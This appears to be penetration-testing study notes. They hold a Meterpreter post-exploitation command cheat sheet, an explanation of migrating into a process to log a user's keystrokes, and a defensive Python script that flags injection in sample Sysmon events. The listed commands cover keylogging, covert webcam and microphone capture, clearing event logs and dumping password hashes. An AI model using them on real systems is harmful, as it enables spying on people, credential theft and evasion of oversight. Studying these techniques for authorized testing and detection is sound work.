## Top Commands

**Meterpreter Commands**

```Terminal
sessions -u NUMBER ---> Turn Shell into Meterpreter session
run ---> Executes a Meterpreter script or Post module
sessions ---> Quickly switch to another session
migrate ---> Allows you to migrate Meterpreter to another process
background ---> Backgrounds the current session
exit ---> Terminate the Meterpreter session
help ---> Displays the help menu
info ---> Displays information about a Post module
irb ---> Opens an interactive Ruby shell on the current session
load ---> Loads one or more Meterpreter extensions

#Networking commands
arp ---> Displays the host ARP (Address Resolution Protocol) cache
ifconfig ---> Displays network interfaces available on the target system
netstat ---> Displays the network connections
portfwd ---> Forwards a local port to a remote service
route ---> Allows you to view and modify the routing table
resolve X_Y ---> Check DNS of local network to find a host IP

#System commands
clearev ---> Clears the event logs
execute ---> Executes a command
getpid ---> Shows the current process identifier
getuid ---> Shows the user that Meterpreter is running as
kill ---> Terminates a process
pkill ---> Terminates processes by name
ps ---> Lists running processes
reboot ---> Reboots the remote computer
shell ---> Drops into a system command shell
shutdown ---> Shuts down the remote computer
sysinfo ---> Gets information about the remote system, such as OS

#Other Commands (Listed under different menu categories in the help section)
idletime ---> Returns the number of seconds the remote user has been idle
keyscan_dump ---> Dumps the keystroke buffer
keyscan_start ---> Starts capturing keystrokes
keyscan_stop ---> Stops capturing keystrokes
screenshare ---> Allows you to watch the remote user's desktop in real time
screenshot ---> Grabs a screenshot of the interactive desktop
record_mic ---> Records audio from the default microphone for X seconds
webcam_chat ---> Starts a video chat
webcam_list ---> Lists webcams
webcam_snap ---> Takes a snapshot from the specified webcam
webcam_stream ---> Plays a video stream from the specified webcam
getsystem ---> Attempts to elevate your privilege to that of local system
hashdump ---> Dumps the contents of the SAM database
```

- Meterpreter Migration Shell

Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the `keyscan_start`, `keyscan_stop`, and `keyscan_dump` command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session. If you migrate into a browser's process, it might even be possible to inject elements into the web page.

To migrate the session, you can use the `migrate` command and specify the PID of the target process. For example, if you wanted to migrate the session to the process with PID 1234, you would use the following command:

The migrate command

```shell-session
meterpreter > migrate 1234
[*] Migrating from 1304 to 1234...
[*] Migration completed successfully.
meterpreter >
```

When you migrate the session to a different process, the payload is injected into the target process and begins executing within its context. This means that the payload is now running inside the target process and has the same privileges and access to resources as that process. We can think of this as both PIDs fusing together!

Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
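
For detection: migration as described above places the payload in another process, and on Windows this kind of injection commonly surfaces in Sysmon as Event ID 8 (CreateRemoteThread). The following is an added example, not part of the original notes: it parses constructed Event ID 8 messages and flags remote threads whose start address is unbacked or that cross a user boundary. The sample events, the `update.exe` path and the allowlist are assumptions.

```python
# Constructed Sysmon Event ID 8 messages (not real telemetry). Field names follow
# the Sysmon schema; PIDs 1304 -> 1234 mirror the migrate example on this page.
SAMPLE_EVENTS = [
    "SourceProcessId: 1304\nSourceImage: C:\\Users\\Public\\update.exe\n"
    "TargetProcessId: 1234\nTargetImage: C:\\Windows\\System32\\notepad.exe\n"
    "StartModule: -\nSourceUser: NT AUTHORITY\\SYSTEM\nTargetUser: LAB\\alice",
    "SourceProcessId: 612\nSourceImage: C:\\Windows\\System32\\csrss.exe\n"
    "TargetProcessId: 4020\nTargetImage: C:\\Windows\\System32\\cmd.exe\n"
    "StartModule: C:\\Windows\\System32\\kernel32.dll\n"
    "SourceUser: NT AUTHORITY\\SYSTEM\nTargetUser: LAB\\alice",
]

# Hypothetical allowlist: processes your own baseline shows creating remote threads.
EXPECTED_SOURCES = {r"c:\windows\system32\csrss.exe"}


def parse_event(message):
    """Turn the 'Key: value' lines of a rendered Sysmon message into a dict."""
    pairs = (line.partition(": ") for line in message.splitlines())
    return {key.strip(): value.strip() for key, sep, value in pairs if sep}


def assess(event):
    """Return the reasons an event looks like injection (empty list: not flagged)."""
    if event.get("SourceImage", "").lower() in EXPECTED_SOURCES:
        return []
    reasons = []
    if event.get("StartModule", "-") in ("", "-"):
        reasons.append("thread start address is not backed by a loaded module")
    if event.get("SourceUser") != event.get("TargetUser"):
        reasons.append("source and target processes run as different users")
    return reasons


def scan(messages):
    """Map (source PID, target PID) of each flagged event to its reasons."""
    findings = {}
    for event in map(parse_event, messages):
        reasons = assess(event)
        if reasons:
            findings[(event["SourceProcessId"], event["TargetProcessId"])] = reasons
    return findings


if __name__ == "__main__":
    for pids, reasons in scan(SAMPLE_EVENTS).items():
        print("PID %s -> PID %s:" % pids, "; ".join(reasons))
```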